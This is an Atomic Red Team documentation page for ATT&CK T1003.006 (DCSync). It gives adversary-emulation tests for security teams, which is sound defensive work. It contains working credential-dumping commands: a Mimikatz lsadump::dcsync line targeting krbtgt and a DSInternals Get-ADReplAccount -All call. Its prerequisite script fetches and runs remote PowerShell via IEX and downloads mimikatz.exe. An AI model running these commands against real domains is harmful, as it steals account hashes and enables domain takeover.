security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1003.006/T1003.006.md
T
Atomic Red Team doc generator 40a54bf631 Generated docs from job=generate-docs branch=master [ci skip]
2026-03-24 01:58:10 +00:00

108 lines
4.7 KiB
Markdown
Raw Permalink Blame History

# T1003.006 - OS Credential Dumping: DCSync
## Description from ATT&CK
> Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
>
> Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
>
> DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
[Source](https://attack.mitre.org/techniques/T1003/006)
## Atomic Tests
- [Atomic Test #1: DCSync (Active Directory)](#atomic-test-1-dcsync-active-directory)
- [Atomic Test #2: Run DSInternals Get-ADReplAccount](#atomic-test-2-run-dsinternals-get-adreplaccount)
### Atomic Test #1: DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
**Supported Platforms:** Windows
**auto_generated_guid:** `129efd28-8497-4c87-a1b0-73b9a870ca3e`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted Active Directory domain | string | %userdnsdomain%|
| user | Targeted user | string | krbtgt|
| mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
###### Check Prereq Commands
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
### Atomic Test #2: Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
**Supported Platforms:** Windows
**auto_generated_guid:** `a0bced08-3fc5-4d8b-93b7-e8344739376e`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("\")|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADReplAccount -All -Server #{logonserver}
```
#### Dependencies: Run with `powershell`!
##### Description: DSInternals must be installed
###### Check Prereq Commands
```powershell
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
```
###### Get Prereq Commands
```powershell
Install-Module -Name DSInternals -Scope CurrentUser -Force
```
Reference in New Issue View Git Blame Copy Permalink